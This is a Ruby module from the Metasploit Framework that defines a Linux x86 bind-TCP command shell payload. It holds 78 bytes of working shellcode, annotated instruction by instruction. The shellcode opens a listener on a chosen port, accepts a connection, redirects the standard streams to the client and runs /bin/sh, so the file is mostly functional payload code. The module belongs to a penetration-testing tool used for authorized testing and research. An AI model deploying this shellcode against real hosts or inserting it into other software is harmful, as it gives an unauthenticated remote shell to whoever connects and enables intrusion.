##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Linux x86 inline bind-TCP command shell.
#
# The 'Payload' below is 78 bytes of hand-written shellcode that, in order:
#   socket(AF_INET, SOCK_STREAM, 0)             via socketcall(SYS_SOCKET)
#   bind(fd, {AF_INET, LPORT, INADDR_ANY}, 16)  via socketcall(SYS_BIND)
#   listen(fd, 0)                               via socketcall(SYS_LISTEN)
#   accept(fd, NULL, ...)                       via socketcall(SYS_ACCEPT)
#   dup2(client, n) for n = fd down to 0        (stdin/stdout/stderr -> client)
#   execve("/bin//sh", ["/bin//sh", NULL], NULL)
#
# Operational caveat: this is an unauthenticated, unencrypted listener bound
# to INADDR_ANY -- anything that can reach LPORT on the target gets the shell
# until a client connects (the listener is closed by the dup2 loop, see below).
# Prefer a reverse payload where egress allows it.
module MetasploitModule
  # Byte length of the 'Payload' string; must be updated if the bytes change.
  CachedSize = 78

  include Msf::Payload::Single
  # Shared Linux x86 prepend handling (the Prepend* options live in this mixin).
  include Msf::Payload::Linux::X86::Prepends
  include Msf::Sessions::CommandShellOptions

  # Registers the payload's metadata, handler, session type and raw bytes.
  #
  # @param info [Hash] info supplied by the module loader; merged over the
  #   defaults declared here.
  def initialize(info = {})
    super(
      merge_info(
        info,
        'Name' => 'Linux Command Shell, Bind TCP Inline',
        'Description' => 'Listen for a connection and spawn a command shell',
        'Author' => 'Ramon de C Valle',
        'License' => MSF_LICENSE,
        'Platform' => 'linux',
        'Arch' => ARCH_X86,
        'Handler' => Msf::Handler::BindTcp,
        'Session' => Msf::Sessions::CommandShellUnix,
        'Payload' => {
          'Offsets' =>
            {
              # LPORT is patched in as a 16-bit network-order ('n') value at
              # byte 21: the 0x04 0xd2 (1234) inside the 'pushl $0xd2040200'
              # immediate that forms sin_port of the sockaddr_in.
              'LPORT' => [ 21, 'n' ]
            },
          # TODO: Payload source needs serious cleanup. This payload was
          # originally generated from
          # external/source/unixasm/lin-x86-bndsockcode.s which supposedly
          # worked when it was initially committed. Nevertheless, it was
          # calling bind(2) with insane parameters, which ended up erroring out
          # and causing execution to fall off the end of the shellcode,
          # bursting into flames. See #7216, #7224. The argument blocks as the
          # bytes now stand are annotated instruction by instruction below.
          'Payload' =>
            # --- socket(AF_INET, SOCK_STREAM, 0) -------------------------
            # mul by a zeroed ebx clears both eax and edx; edx stays 0 for the
            # rest of the shellcode and doubles as INADDR_ANY and the NULL envp.
            "\x31\xdb" + # xorl %ebx,%ebx #
            "\xf7\xe3" + # mull %ebx #          eax = edx = 0
            "\x53" + # pushl %ebx #             protocol = 0
            "\x43" + # incl %ebx #              ebx = 1 = SYS_SOCKET
            "\x53" + # pushl %ebx #             type = SOCK_STREAM (1)
            "\x6a\x02" + # pushl $0x02 #        domain = AF_INET
            "\x89\xe1" + # movl %esp,%ecx #     ecx -> {2, 1, 0}
            "\xb0\x66" + # movb $0x66,%al #     0x66 = socketcall
            "\xcd\x80" + # int $0x80 #          eax = listening fd
            # --- bind(fd, &sockaddr_in, 16) --------------------------------
            # Two pops then two pushes overwrite the socket() argument array in
            # place with the sockaddr_in, so ecx (still the old esp) now points
            # at {sin_family=2, sin_port=LPORT, sin_addr=0}.
            "\x5b" + # popl %ebx #              ebx = 2 = SYS_BIND (was AF_INET)
            "\x5e" + # popl %esi #              discard SOCK_STREAM
            "\x52" + # pushl %edx #             sin_addr = 0 (INADDR_ANY)
            "\x68\x02\x00\x04\xd2" + # pushl $0xd2040200 # sin_family=AF_INET, sin_port=LPORT (offset 21)
            "\x6a\x10" + # pushl $0x10 #        addrlen = 16
            "\x51" + # pushl %ecx #             &sockaddr_in
            "\x50" + # pushl %eax #             fd
            "\x89\xe1" + # movl %esp,%ecx #     ecx -> {fd, &sockaddr_in, 16}
            "\x6a\x66" + # pushl $0x66 #
            "\x58" + # popl %eax #              eax = socketcall
            "\xcd\x80" + # int $0x80 #
            # --- listen(fd, 0) ---------------------------------------------
            # bind's return value (0 on success) overwrites the sockaddr pointer
            # slot, so the same block reads as {fd, 0, 16} for listen and accept
            # (backlog 0, addr NULL).
            "\x89\x41\x04" + # movl %eax,0x04(%ecx) #
            "\xb3\x04" + # movb $0x04,%bl #     ebx = 4 = SYS_LISTEN
            "\xb0\x66" + # movb $0x66,%al #
            "\xcd\x80" + # int $0x80 #
            # --- accept(fd, NULL, ...) -------------------------------------
            "\x43" + # incl %ebx #              ebx = 5 = SYS_ACCEPT
            "\xb0\x66" + # movb $0x66,%al #
            "\xcd\x80" + # int $0x80 #          eax = client fd
            # --- dup2(client, n) for n = fd down to 0 ----------------------
            # ecx is popped from the top of the arg block, i.e. the listening
            # fd. The first iteration therefore dup2s the client over the
            # listener, which closes it and releases LPORT; the loop then
            # walks down to fd 0 so stdin/stdout/stderr all point at the client.
            "\x93" + # xchgl %eax,%ebx #        ebx = client fd
            "\x59" + # popl %ecx #              ecx = listening fd
            "\x6a\x3f" + # pushl $0x3f #        loop head (jns target)
            "\x58" + # popl %eax #              eax = 0x3f = dup2 (reset each pass)
            "\xcd\x80" + # int $0x80 #
            "\x49" + # decl %ecx #
            "\x79\xf8" + # jns <bndsockcode+50> # repeat while ecx >= 0
            # --- execve("/bin//sh", {"/bin//sh", NULL}, NULL) -------------
            # eax is 0 here because the final dup2 targeted fd 0 and returned it,
            # so pushing eax supplies the argv terminator without another xor.
            # edx has been 0 since the mul above and serves as envp.
            "\x68\x2f\x2f\x73\x68" + # pushl $0x68732f2f #  "//sh"
            "\x68\x2f\x62\x69\x6e" + # pushl $0x6e69622f #  "/bin"
            "\x89\xe3" + # movl %esp,%ebx #     ebx -> "/bin//sh"
            "\x50" + # pushl %eax #             argv[1] = NULL
            "\x53" + # pushl %ebx #             argv[0] = path
            "\x89\xe1" + # movl %esp,%ecx #     ecx = argv
            "\xb0\x0b" + # movb $0x0b,%al #     0x0b = execve
            "\xcd\x80" # int $0x80 #
        }
      )
    )
  end
end